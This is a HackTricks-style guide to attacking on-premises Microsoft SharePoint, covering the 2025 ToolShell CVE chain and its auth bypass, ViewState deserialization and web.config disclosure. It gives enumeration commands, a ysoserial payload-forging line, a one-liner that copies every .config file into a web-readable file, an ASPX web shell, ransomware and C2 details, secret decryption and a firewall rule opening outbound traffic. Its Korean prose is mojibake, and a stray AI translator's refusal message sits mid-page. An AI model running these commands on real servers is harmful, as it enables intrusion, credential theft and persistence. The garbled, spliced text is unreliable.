Microsoft SharePoint โ Pentesting & Exploitation
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.
Microsoft SharePoint (on-premises)์ ASP.NET/IIS ์์ ๊ตฌ์ถ๋์ด ์์ต๋๋ค. ๋ฐ๋ผ์ ๋๋ถ๋ถ์ ๊ณ ์ ์ ์ธ ์น ๊ณต๊ฒฉ ํ๋ฉด(ViewState, Web.Config, web shells ๋ฑ)์ ์กด์ฌํ์ง๋ง, SharePoint๋ ์๋ฐฑ ๊ฐ์ ๋ ์ ASPX ํ์ด์ง์ ์น ์๋น์ค๋ ํฌํจํ์ฌ ๋ ธ์ถ๋ ๊ณต๊ฒฉ ํ๋ฉด์ ํฌ๊ฒ ํ์ฅํฉ๋๋ค. ์ด ํ์ด์ง๋ SharePoint ํ๊ฒฝ ๋ด๋ถ์์ enumerate, exploit ๋ฐ persistํ๊ธฐ ์ํ ์ค์ฉ์ ์ธ ๊ธฐ๋ฒ๋ค์ ๋ชจ์๋์์ผ๋ฉฐ, Unit42๊ฐ ๊ณต๊ฐํ 2025 exploit chain (CVE-2025-49704/49706/53770/53771)์ ์ค์ ์ ์ผ๋ก ๋ค๋ฃน๋๋ค.
1. ๋น ๋ฅธ ์ด๊ฑฐ
# favicon hash and keywords
curl -s https://<host>/_layouts/15/images/SharePointHome.png
curl -s https://<host>/_vti_bin/client.svc | file - # returns WCF/XSI
# version leakage (often in JS)
curl -s https://<host>/_layouts/15/init.js | grep -i "spPageContextInfo"
# interesting standard paths
/_layouts/15/ToolPane.aspx # vulnerable page used in 2025 exploit chain
/_vti_bin/Lists.asmx # legacy SOAP service
/_catalogs/masterpage/Forms/AllItems.aspx
# enumerate sites & site-collections (requires at least Anonymous)
python3 Office365-ADFSBrute/SharePointURLBrute.py -u https://<host>
2. 2025 ์ต์คํ๋ก์ ์ฒด์ธ (a.k.a. โToolShellโ)
2.1 CVE-2025-49704 โ Code Injection on ToolPane.aspx
/_layouts/15/ToolPane.aspx?PageView=โฆ&DefaultWebPartId=<payload> ์ ํ์ด์ง์ ์์์ Server-Side Include ์ฝ๋๋ฅผ ์ฃผ์
ํ ์ ์๊ฒ ํ๋ฉฐ, ์ด ์ฝ๋๋ ์ดํ ASP.NET์ ์ํด ์ปดํ์ผ๋ฉ๋๋ค. ๊ณต๊ฒฉ์๋ Process.Start()๋ฅผ ์คํํ๋ C#์ ์๋ฒ ๋ํ๊ณ ์
์ฑ ViewState๋ฅผ ์ ์กํ ์ ์์ต๋๋ค.
2.2 CVE-2025-49706 โ Improper Authentication Bypass
๊ฐ์ ํ์ด์ง๋ ์ฌ์ดํธ ์ปจํ
์คํธ๋ฅผ ๊ฒฐ์ ํ๊ธฐ ์ํด X-Forms_BaseUrl ํค๋๋ฅผ ์ ๋ขฐํฉ๋๋ค. ์ด๋ฅผ /_layouts/15/๋ก ์ง์ ํ๋ฉด ๋ฃจํธ ์ฌ์ดํธ์์ ์ ์ฉ๋๋ MFA/SSO๋ฅผ unauthenticated ์ํ๋ก ์ฐํํ ์ ์์ต๋๋ค.
2.3 CVE-2025-53770 โ ์ธ์ฆ๋์ง ์์ ViewState Deserialization โ RCE
๊ณต๊ฒฉ์๊ฐ ToolPane.aspx ๋ด์ gadget์ ์ ์ดํ๋ฉด unsigned (๋๋ MAC-only) __VIEWSTATE ๊ฐ์ ์ ์กํ์ฌ w3wp.exe ๋ด๋ถ์์ .NET deserialization์ ์ ๋ฐํ๊ณ ์ฝ๋ ์คํ์ผ๋ก ์ด์ด์ง ์ ์์ต๋๋ค.
์๋ช
์ด ํ์ฑํ๋ ๊ฒฝ์ฐ, ์ด๋ค web.config์์๋ ValidationKey/DecryptionKey๋ฅผ ํ์ทจ(2.4 ์ฐธ์กฐ)ํ๊ณ ysoserial.net ๋๋ ysodom์ผ๋ก ํ์ด๋ก๋๋ฅผ ์์กฐํฉ๋๋ค:
ysoserial.exe -g TypeConfuseDelegate -f Json.Net -o raw -c "cmd /c whoami" |
ViewStateGenerator.exe --validation-key <hex> --decryption-key <hex> -o payload.txt
For an in-depth explanation on abusing ASP.NET ViewState read:
Exploiting __VIEWSTATE without knowing the secrets
2.4 CVE-2025-53771 โ Path Traversal / web.config Disclosure
์ ๊ตํ๊ฒ ๋ง๋ Source ํ๋ผ๋ฏธํฐ๋ฅผ ToolPane.aspx์ ์ ์กํ๋ฉด(e.g. ../../../../web.config) ๋์ ํ์ผ์ด ๋ฐํ๋์ด ๋ค์ ํญ๋ชฉ์ leakage๋ฅผ ํ์ฉํ๋ค:
<machineKey validationKey="โฆ" decryptionKey="โฆ">โ forge ViewState / ASPXAUTH cookies- connection strings & secrets.
2.5 ToolShell workflow observed in Ink Dragon intrusions
Check Point๋ Ink Dragon์ด Microsoft๊ฐ ํจ์น๋ฅผ ๋ฐฐํฌํ๊ธฐ ์๊ฐ์ ์ ์ ToolShell ์ฒด์ธ์ ์ด๋ป๊ฒ ์ด์ํ๋์ง ๋งตํํ๋ค:
- Header spoofing for auth bypass โ ๊ณต๊ฒฉ์๋
/_layouts/15/ToolPane.aspx๋ก POST๋ฅผ ์ ์กํ๋ฉด์Referer: https://<victim>/_layouts/15/์ ์์กฐ๋X-Forms_BaseUrl๋ฅผ ํจ๊ป ๋ณด๋ธ๋ค. ํด๋น ํค๋๋ค์ SharePoint์๊ฒ ์์ฒญ์ด ์ ๋ขฐ๋ layout์์ ์๋ค๊ณ ํ๋จํ๊ฒ ํ๋ฉฐ front-door ์ธ์ฆ์ ์์ ํ ์ฐํ์ํจ๋ค (CVE-2025-49706/CVE-2025-53771). - Serialized gadget in the same request โ ์์ฒญ ๋ณธ๋ฌธ์๋ ๊ณต๊ฒฉ์๊ฐ ์ ์ดํ๋ ViewState/ToolPart ๋ฐ์ดํฐ๊ฐ ํฌํจ๋์ด ์ทจ์ฝํ ์๋ฒ์ธก formatter์ ๋๋ฌํ๋ค (CVE-2025-49704/CVE-2025-53770). ํ์ด๋ก๋๋ ๋ณดํต ysoserial.net ์ฒด์ธ์ผ๋ก,
w3wp.exe๋ด๋ถ์์ ๋์คํฌ์ ์ฐ์ง ์๊ณ ์คํ๋๋ค. - Internet-scale scanning โ 2025๋
7์์ ํ
๋ ๋ฉํธ๋ฆฌ๋ ๊ทธ๋ค์ด ์ ๊ทผ ๊ฐ๋ฅํ ๋ชจ๋
/_layouts/15/ToolPane.aspx์๋ํฌ์ธํธ๋ฅผ ์ด๊ฑฐํ๊ณ leaked<machineKey>์์ ์ฌ์ ์ ์ฌ์ํ๊ณ ์์์ ๋ณด์ฌ์ค๋ค. ๋ฌธ์์์ ์ํvalidationKey๋ฅผ ๋ณต์ฌํด ์ฌ์ฉํ ์ฌ์ดํธ๋ ๋ค๋ฅธ ๋ถ๋ถ์ด ์์ ํ ํจ์น๋์ด ์๋๋ผ๋ ํ์ทจ๋ ์ ์๋ค (์๋ช ์ํฌํ๋ก์ฐ๋ ViewState ํ์ด์ง ์ฐธ์กฐ). - Immediate staging โ ์ฑ๊ณต์ ์ธ ์ต์คํ๋ก์์ ๋ก๋๋ PowerShell stager๋ฅผ ๋จ์ด๋จ๋ฆฌ๋ฉฐ, ์ด๋ (1) ๋ชจ๋
web.config๋ฅผ ๋คํํ๊ณ , (2) ๋น์ ์ ๊ทผ์ฉ ASPX webshell์ ์ฌ๊ณ , (3) IIS ์์ปค์์ ํ์ถํ๊ธฐ ์ํ ๋ก์ปฌ Potato privesc๋ฅผ ์์ฝํ๋ค.
3. Post-exploitation recipes observed in the wild
3.1 Exfiltrate every .config file (variation-1)
cmd.exe /c for /R C:\inetpub\wwwroot %i in (*.config) do @type "%i" >> "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\debug_dev.js"
๊ฒฐ๊ณผ๋ฌผ์ธ debug_dev.js๋ ์ต๋ช
์ผ๋ก ๋ค์ด๋ก๋ํ ์ ์์ผ๋ฉฐ ๋ชจ๋ ๋ฏผ๊ฐํ ์ค์ ์ ํฌํจํ๊ณ ์์ต๋๋ค.
3.2 Base64-encoded ASPX web shell (variation-2) ๋ฐฐํฌ
powershell.exe -EncodedCommand <base64>
๋์ฝ๋ฉ๋ ํ์ด๋ก๋ ์์ (์ถ์ฝ๋จ):
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Security.Cryptography" %>
<script runat="server">
protected void Page_Load(object sender, EventArgs e){
Response.Write(MachineKey.ValidationKey);
// echo secrets or invoke cmd
}
</script>
I donโt see the file content to translate. Please paste the markdown/text from src/network-services-pentesting/pentesting-web/microsoft-sharepoint.md (or specify the sections to translate), and Iโll translate it to Korean while preserving all tags, links, code and paths exactly.
C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx
The shell exposes endpoints to read / rotate machine keys which allows forging ViewState and ASPXAUTH cookies across the farm.
3.3 ๋๋ ํ ๋ณํ (variation-3)
๋์ผํ ์ ธ์ด์ง๋ง:
- ๋ค์ ๊ฒฝ๋ก์ ๋ฐฐ์น๋จ:
...\15\TEMPLATE\LAYOUTS\ - ๋ณ์ ์ด๋ฆ์ ํ ๊ธ์๋ก ์ถ์
- ์๋๋ฐ์ค ํํผ ๋ฐ ํ์ด๋ฐ ๊ธฐ๋ฐ AV ์ฐํ๋ฅผ ์ํด
Thread.Sleep(<ms>)์ถ๊ฐ๋จ.
3.4 AK47C2 ๋ค์ค ํ๋กํ ์ฝ ๋ฐฑ๋์ด & X2ANYLOCK ransomware (๊ด์ฐฐ๋ ์๊ธฐ 2025-2026)
์ต๊ทผ ์ธ์๋ํธ ๋์ ์กฐ์ฌ(Unit42 โProject AK47โ)๋ ๊ณต๊ฒฉ์๋ค์ด ์ด๊ธฐ RCE ์ดํ ToolShell ์ฒด์ธ์ ํ์ฉํด SharePoint ํ๊ฒฝ์ dual-channel C2 ์ํ๋ํธ์ ransomware๋ฅผ ๋ฐฐํฌํ๋ ๋ฐฉ๋ฒ์ ๋ณด์ฌ์ค๋ค:
AK47C2 โ dnsclient ๋ณํ
- ํ๋์ฝ๋ฉ๋ DNS ์๋ฒ:
10.7.66.10โ ๊ถํ ๋๋ฉ์ธupdate.updatemicfosoft.com์ ํต์ . - ๋ฉ์์ง๋ JSON ๊ฐ์ฒด์ด๋ฉฐ static key
VHBD@H๋ก XOR ์ํธํ๋๊ณ , hex ์ธ์ฝ๋ฉ๋์ด sub-domain labels๋ก ์๋ฒ ๋๋จ.
{"cmd":"<COMMAND>","cmd_id":"<ID>"}
- ๊ธด ์ฟผ๋ฆฌ๋ ๋ถํ ๋์ด
s๋ก ์ ๋์ฌ ์ฒ๋ฆฌ๋๋ฉฐ ์๋ฒ ์ธก์์ ์ฌ์กฐ๋ฆฝ๋จ. - ์๋ฒ๋ ๋์ผํ XOR/hex ์คํด์ ์ฌ์ฉํ๋ TXT ๋ ์ฝ๋๋ก ์๋ต:
{"cmd":"<COMMAND>","cmd_id":"<ID>","type":"result","fqdn":"<HOST>","result":"<OUTPUT>"}
- ๋ฒ์ 202504์ ๊ฐ์ํ๋ ํ์
<COMMAND>::<SESSION_KEY>์ ์ฒญํฌ ๋ง์ปค1,2,a๋ฅผ ๋์ ํจ.
AK47C2 โ httpclient ๋ณํ
- ๋์ผํ JSON & XOR ๋ฃจํด์ ์ฌ์ฌ์ฉํ์ง๋ง hex blob์
libcurl์ HTTP POST body(์:CURLOPT_POSTFIELDS)๋ก ์ ์กํจ. - ๋์ผํ ์์
/๊ฒฐ๊ณผ ์ํฌํ๋ก๋ก ๋ค์์ ํ์ฉ:
- ์์์ ์ ธ ๋ช ๋ น ์คํ.
- ๋์ sleep ๊ฐ๊ฒฉ ๋ฐ kill-switch ์ง์.
X2ANYLOCK ransomware
- 64-bit C++ ํ์ด๋ก๋๊ฐ DLL side-loading์ ํตํด ๋ก๋๋จ(์๋ ์ฐธ์กฐ).
- ํ์ผ ๋ฐ์ดํฐ์ AES-CBC๋ฅผ ์ฌ์ฉํ๊ณ AES ํค๋ฅผ ๋ฉํํ๋ ๋ฐ RSA-2048์ ์ฌ์ฉํ ๋ค ํ์ฅ์
.x2anylock๋ฅผ ์ถ๊ฐํจ. - ๋ก์ปฌ ๋๋ผ์ด๋ธ์ ๋ฐ๊ฒฌ๋ SMB ๊ณต์ ๋ฅผ ์ฌ๊ท์ ์ผ๋ก ์ํธํ; ์์คํ ๊ฒฝ๋ก๋ ๊ฑด๋๋.
- ํ์์ฉ static Tox ID๋ฅผ ํฌํจํ ํ๋ฌธ ๋
ธํธ
How to decrypt my data.txt๋ฅผ ๋จ๊น. - ๋ด๋ถ kill-switch ํฌํจ:
if (file_mod_time >= "2026-06-06") exit(0);
DLL side-loading chain
- ๊ณต๊ฒฉ์๋ ํฉ๋ฒ์ ์ธ
7z.exe์์dllhijacked.dll/My7zdllhijacked.dll๋ฅผ ์์ฑ. - SharePoint๊ฐ ์์ฑํ
w3wp.exe๊ฐ7z.exe๋ฅผ ์คํํ๊ณ , Windows ๊ฒ์ ์์ ๋๋ฌธ์ ์ ์ฑ DLL์ด ๋ก๋๋์ด ๋ฉ๋ชจ๋ฆฌ์์ ransomware ์ํธ๋ฆฌํฌ์ธํธ๋ฅผ ํธ์ถํจ. - ๋ณ๋์ LockBit ๋ก๋(
bbb.msiโclink_x86.exeโclink_dll_x86.dll)๊ฐ ์์ฝ๋๋ฅผ ๋ณตํธํํ๊ณ LockBit 3.0์ ์คํํ๊ธฐ ์ํดd3dl1.dll์ DLL hollowing์ ์ํํจ.
[!INFO] X2ANYLOCK์์ ๋ฐ๊ฒฌ๋ ๋์ผํ static Tox ID๊ฐ leaked LockBit databases์์๋ ๋ํ๋๋ฉฐ, ์ ํด์(affiliate) ๊ฒน์นจ์ ์์ฌํจ.
3.5 SharePoint loot๋ฅผ ์ด์ฉํ lateral movement
- Decrypt every protected section โ ์น ํฐ์ด์ ์๋ฆฌ ์ก์ผ๋ฉด
aspnet_regiis.exe -px "connectionStrings" C:\\temp\\conn.xml -pri(๋๋-px "appSettings")๋ฅผ ์ ์ฉํด<connectionStrings configProtectionProvider="RsaProtectedConfigurationProvider">๋ค์ ์จ์ ํ๋ฌธ ๋น๋ฐ์ ๋คํํ๋ผ. Ink Dragon์ ์ด ๋ฐฉ๋ฒ์ผ๋ก SQL ๋ก๊ทธ์ธ, SMTP ๋ฆด๋ ์ด ๋ฐ ๋ง์ถค ์๋น์ค ์๊ฒฉ ์ฆ๋ช ์ ๋ฐ๋ณต์ ์ผ๋ก ์์งํ๋ค. - Recycle app-pool accounts across farms โ ๋ง์ ๊ธฐ์
๋ค์ด ๋ชจ๋ ํ๋ก ํธ์๋์์
IIS APPPOOL\SharePoint์ ๊ฐ์ ๋๋ฉ์ธ ๊ณ์ ์ ์ฌ์ฌ์ฉํ๋ค.identity impersonate="..."๋ธ๋ก์ ๋ณตํธํํ๊ฑฐ๋ApplicationHost.config๋ฅผ ์ฝ์ ํ ํด๋น ์๊ฒฉ์ฆ๋ช ์ SMB/RDP/WinRM์ ํตํด ๋ค๋ฅธ ์๋ฒ์ ๋ํด ํ ์คํธํ๋ผ. ์ฌ๋ฌ ์ฌ๋ก์์ ํด๋น ๊ณ์ ์ด ๋ก์ปฌ ๊ด๋ฆฌ์์ด๊ธฐ๋ ํ์ผ๋ฉฐ, ์ด๋psexec,sc create๋๋ ์ค์ผ์ค๋ฌ ํ์คํฌ๋ฅผ ํตํ ์คํ ์ด์ง์ ๋น๋ฐ๋ฒํธ ์คํ๋ ์ด ์์ด ๊ฐ๋ฅํ๊ฒ ํ๋ค. - Abuse leaked
<machineKey>values internally โ ์ธํฐ๋ท ๊ฒฝ๊ณ๊ฐ ํจ์น๋์ด๋ ๋์ผํvalidationKey/decryptionKey๋ฅผ ์ฌ์ฌ์ฉํ๋ฉด ์๋ก ์ ๋ขฐํ๋ ๋ด๋ถ SharePoint ์กด ๊ฐ์ lateral ViewState exploitation์ด ๊ฐ๋ฅํ๋ค.
3.6 2025 ์นจํด์์ ๊ด์ฐฐ๋ ์ง์์ฑ ํจํด
- Scheduled tasks โ
SYSCHECK๊ฐ์(ํน์ ๊ธฐํ ์ํ ๊ด๋ จ ์ด๋ฆ) ์ผํ์ฑ ํ์คํฌ๋ฅผ/ru SYSTEM /sc once /st <hh:mm>๋ก ์์ฑํด ๋ค์ ๋จ๊ณ ๋ก๋(๋๊ฐ ์ด๋ฆ์ด ๋ฐ๋conhost.exe)๋ฅผ ๋ถํธ์คํธ๋ฉํ๋ค. ์ผํ ์คํ์ด๊ธฐ ๋๋ฌธ์ ํ์คํ ๋ฆฌ ํ์คํฌ XML์ด ๋ณด์กด๋์ง ์์ผ๋ฉด ํ ๋ ๋ฉํธ๋ฆฌ๊ฐ ๋์น๊ธฐ ์ฝ๋ค. - Masqueraded services โ
WindowsTempUpdate,WaaSMaintainer,MicrosoftTelemetryHost๊ฐ์ ์๋น์ค๋ฅผsc create๋ก sideloading triad ๋๋ ํฐ๋ฆฌ๋ฅผ ๊ฐ๋ฆฌํค๋๋ก ์ค์นํ๋ค. ์ด ์คํํ์ผ๋ค์ ์๋์ AMD/Realtek/NVIDIA ์๋ช ์ ์ ์งํ์ง๋ง Windows ๊ตฌ์ฑ ์์์ ๋ง์ถฐ ์ด๋ฆ์ด ๋ฐ๋์ด ์๋ค; ๋์คํฌ ์์ ํ์ผ๋ช ๊ณผ PE์OriginalFileNameํ๋๋ฅผ ๋น๊ตํ๋ฉด ๋น ๋ฅธ ๋ฌด๊ฒฐ์ฑ ๊ฒ์ฌ๋ก ํ์ฉํ ์ ์๋ค.
3.7 ๋ฆด๋ ์ด ํธ๋ํฝ์ ์ํ ํธ์คํธ ๋ฐฉํ๋ฒฝ ๋ค์ด๊ทธ๋ ์ด๋
Ink Dragon์ ์ ๊ธฐ์ ์ผ๋ก Defender ์ ์ง๊ด๋ฆฌ๋ก ์์ฅํ ํ์ฉํ ์์๋ฐ์ด๋ ๊ท์น์ ์ถ๊ฐํ์ฌ ShadowPad/FinalDraft ํธ๋ํฝ์ด ์ด๋ค ํฌํธ๋ก๋ ์ธ๋ถ๋ก ๋๊ฐ ์ ์๊ฒ ํ๋ค:
netsh advfirewall firewall add rule name="Microsoft MsMpEng" dir=out action=allow program="C:\ProgramData\Microsoft\Windows Defender\MsMpEng.exe" enable=yes profile=any
์ด ๊ท์น์ ๋ก์ปฌ์์ ์์ฑ๋์๊ณ (GPO๊ฐ ์๋๋ผ) ์ ์ Defender ๋ฐ์ด๋๋ฆฌ๋ฅผ program=์ผ๋ก ์ฌ์ฉํ๊ธฐ ๋๋ฌธ์ ๋๋ถ๋ถ์ SOC ๊ธฐ์ค์ ์ด๋ฅผ ๋ฌด์ํ์ง๋ง, ๊ทธ๋ผ์๋ Any โ Any ์์๋ฐ์ด๋ ํต์ ์ ํ์ฉํฉ๋๋ค.
๊ด๋ จ ํธ๋ฆญ
- IIS post-exploitation & web.config abuse:
IIS - Internet Information Services
์ฐธ์กฐ
- Unit42 โ Active Exploitation of Microsoft SharePoint Vulnerabilities
- GitHub PoC โ ToolShell exploit chain
- Microsoft Security Advisory โ CVE-2025-49704 / 49706
- Unit42 โ Project AK47 / SharePoint Exploitation & Ransomware Activity
- Microsoft Security Advisory โ CVE-2025-53770 / 53771
- Check Point Research โ Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.


